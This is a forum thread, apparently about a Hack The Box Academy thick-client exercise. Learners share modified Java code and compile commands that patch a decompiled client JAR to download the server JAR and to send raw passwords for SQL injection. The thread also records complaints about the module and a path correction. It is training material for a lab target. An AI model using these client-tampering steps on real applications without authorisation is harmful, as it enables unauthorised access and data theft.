Could you give me some insight on the steps to rebuild the JAR file? I was able to figure out how to download the fatty.-server.jar however I don’t understand really how I did it. I think the module doesn’t do well explaining the exact steps.
thank you
There’s a reply by @hx1 above that explains how to do it. Just follow those steps.
Basically is: modify the code as my reply (for the User file) and the academy (for the clientGUI file) say, compile and move the .class files as @hx1 said, and then try.
So, basically, for every .jar file you have modified, you have to generate .class files for that code and move them into their respective raw directory
I downloaded the Fatty-Client.jar but when i try to decompile it does not work. If I try to run it, it says its corrupted and when I do ‘ls’ I get this:
-a---- 5/29/2023 11:24 AM 68 fatty-server.jar
this shows the full file was not downloaded… any idea why?
Why do you need to download the Fatty-server.jar ? i’m confused here
i try doing everything in the remote rdp session…
i changed the port to 1337, removed the hashes and deleting the 1.RSA and 1.SF files and also added the correct ip address to /hosts and then recompile it…
but it still doesn’t log me in… i don’t know what i’m doing wrong actually
please i will need some help
1 Like
apparently you need to download it for the SQL injection as someone mentioned here. But I will try to do the injection without downloading …
just make sure you are following the steps mentioned in the module very closely … this is one of those questions that one wrong move and you cant tell why its not working.
P.S. make sure in the Manifest file you had the extra empty line after deleting the hashes
1 Like
i finally logged in but… i can’t find the open button… i wonder if it’s hidden
can’t tell… any idea pls
UPDATE: i got it… just needed to expand the app frame
1 Like
The section seems to be poorly written as I noticed a typo in one of the command … as someone mentioned here there is a walkthrough on this machine by ippsec on youtube and it is a 2 hr + long video … HTB should not have placed this exercise casually in the middle of the module
8 Likes
Yeah! i noticed it and reported it
This is good advice. The other day I was able log in with qtc and today I have just been getting connection issues. Might be because I did some things slightly out of order. I’ll follow exactly what they do and hopefully it goes better tomorrow
This is sort of a nightmare. I don’t want to sift through a 2 hour ippsec video to do this. Literally running the commands from the lecture do not work. I’m trying to compile the ClientGuiTest.java file per the instructions and its throwing 31 errors because it can’t find symbols. How do I fix it? No idea.
EDIT:
Okay, I figured out why this wasn’t compiling. in javac -cp fatty-client-new.jar ... you have to be referencing the existing jar. This wasn’t clear from the instructions that it was pulling the symbols and such from the existing jar file. I didn’t realize that was how the command worked and it would have been nice to know. Regardless either be in the directory of the existing fatty-client-new.jar or put the path to it.
EDIT2:
Finished it. Really a difficult exercise without enough depth on process. To anyone else with problems, I recommend checking out this walkthrough which is more in depth on what is actually happening with the code.
5 Likes
this is really a nightmare. probably for me only, the explanation is not very clear. instructions were difficult to follow.
i hope they can provide some screenshots also to help so that it is easier for noobs like me. almost everytime i have to come forum and look for guidance or clearer explanations.
2 Likes
I spent more time solving this than the entire 3 skill checks at the end of this module combined…
To anyone having issues compiling the users.java file like I did, try using javac -cp . C:\TOOLS\fatty-server.jar.src\htb\fatty\shared\resources\*.java to force both the user.java and the other .java file in that directory to compile at the same time. This was the only way I could get it to work.
A poorly explained module, with commands that didn’t work, compounded the difficulty of an already challenging module by orders of magnitude.
2 Likes
Hello guys…
very badly written tutorial . … and ending up in a mess of warnings initially… can some one please help. the help already written is also for some one who is good in java…
2 Likes
At last the programming skills helped me handling the lengthy tutorial … there are ways to teach it… no need to write such a length tutorial where point of focus disappeared some where…
Hey all, Ive gotten to the SQL injection part of this module. the odd thing is that I get the server file and when I decompile it, its not like anything is missing when I look at JD-GUI. It just wont pull up the login screen for me to do anything so I cant finish this out any suggestions? Seems like a technical issue.
Im also getting these errors when I try to open it from command line instead
What am i doing wrong here?
The fatty-server.jar is just for you to analyze and identify SQLi, you don’t need to run it. To exploit the SQLi, you need to change the fatty-client.jar
For everyone having problems since not all us have the same “experience” on the matter on how to compile and such.
The beginning is fairly straight forward so I’ll start to explain my steps from the modification of the “Invoker.java”.
/* Beginning of Invoker.java code */
/* */ package htb.fatty.client.methods;
/* */
/* redacted code */
/* */ import java.util.Base64;
/* */ import java.io.File;
/* */ import java.io.FileOutputStream; /* This is just the beginning of the code where all the library are imported and this is the line we need to add */
/* redacted code */
Going further down we stop at line “122” and we modify the “public String open” function removing what is not necessary and we add our new lines of code:
/* redacted code */
/* */ public String open(String foldername, String filename) throws MessageParseException, MessageBuildException, IOException {
/* 123 */ String methodName = (new Object() { }).getClass().getEnclosingMethod().getName();
/* 124 */ logger.logInfo("[+] Method '" + methodName + "' was called by user '" + this.user.getUsername() + "'.");
/* 125 */ if (AccessCheck.checkAccess(methodName, this.user)) {
/* 126 */ return "Error: Method '" + methodName + "' is not allowed for this user account";
/* */ }
/* */
/* 129 */ this.action = new ActionMessage(this.sessionID, "open");
/* 130 */ this.action.addArgument(foldername);
/* 131 */ this.action.addArgument(filename);
/* 132 */ sendAndRecv();
/* */ String desktopPath = System.getProperty("user.home") + "\\Desktop\\fatty-server.jar"; /* This is the line we need to add */
/* */ FileOutputStream fos = new FileOutputStream(desktopPath); /* This is the line we need to add */
/* 133 */ if (this.response.hasError()) {
/* 134 */ return "Error: Your action caused an error on the application server!";
/* */ }
/* 136 */
/* */ byte[] content = this.response.getContent(); /* This is the line we need to add */
/* */ fos.write(content); /* This is the line we need to add */
/* */ fos.close(); /* This is the line we need to add */
/* */ return "Successfully saved the file to " + desktopPath; /* This is the line we need to add */
/* */ }
/* redacted code */
Once the code has been modified time to compile it.
PS C:\> javac -cp fatty-client-new.jar fatty-client-new.jar.src/htb/fatty/client/methods/Invoker.java
PS C:\> mv -Force fatty-client-new.jar.src/htb/fatty/client/methods/*.class raw/htb/fatty/client/methods/
PS C:\> cd raw
PS C:\raw> jar -cmf META-INF\MANIFEST.MF traverse.jar .
When the above is done, open the “.jar” application just compiled and download the “fatty-server.jar”.
(Hopefully everything goes as planned eheh)
Now, time to jump straight to the “User.java” code in order to modify the “public User” function.
/* redacted code */
/* */ public User(int uid, String username, String password, String email, Role role) {
/* 20 */ this.uid = uid;
/* 21 */ this.username = username;
/* */ this.password = password; /* this is the only line you need to add, the rest can be simply removed */
/* 33 */ this.email = email;
/* 34 */ this.role = role;
/* */ }
/* redacted code */
Going down a bit we have to modify another function, “public void setPassword”.
/* redacted code */
public void setPassword(String password) {
this.password = password;
}
/* redacted code */
Time to recompile everything one more time.
PS C:\> javac -cp fatty-client-new.jar fatty-client-new.jar.src\htb\fatty\shared\resources\User.java
PS C:\> mv -Force fatty-client-new.jar.src/htb/fatty/client/methods/*.class raw/htb/fatty/client/methods/
PS C:\> cd raw
PS C:\raw> jar -cmf META-INF\MANIFEST.MF traverse.jar .
That’s it! Read the rest of the section module carefully and you should be able to complete it.
PS: As asdfer2 suggested there may be something wrong on the last block of code so read is comment. When I’ll have time I’ll double check it.
2 Likes
Hi. There is an error in your code (The last block.) The User.java part creates the class file inside the shared\resources\ folder. Currently you’re advising of copying it to client/methods/ folder, which is incorrect. Other than that this post helped a lot. Didn’t feel like a spoiler, more of an in-depth instructions where the HTB guide lacked.
This is what worked for me:
mv -Force fatty-client-new.jar.src/htb/fatty/shared/resources/*.class raw/htb/fatty/shared/resources/
2 Likes
Thanks for this post! It was exactly what I was looking for. I needed someone to break down the steps like this. The Acadamy module assumes you know how to recompile each time, and I just don’t have the technical background for that yet. People in the Discord chat were recommending watching Ippsec’s 2 hour video, but I just don’t have the patience for that.
Thanks also to Asdfer2 for catching the error in the last post!
2 Likes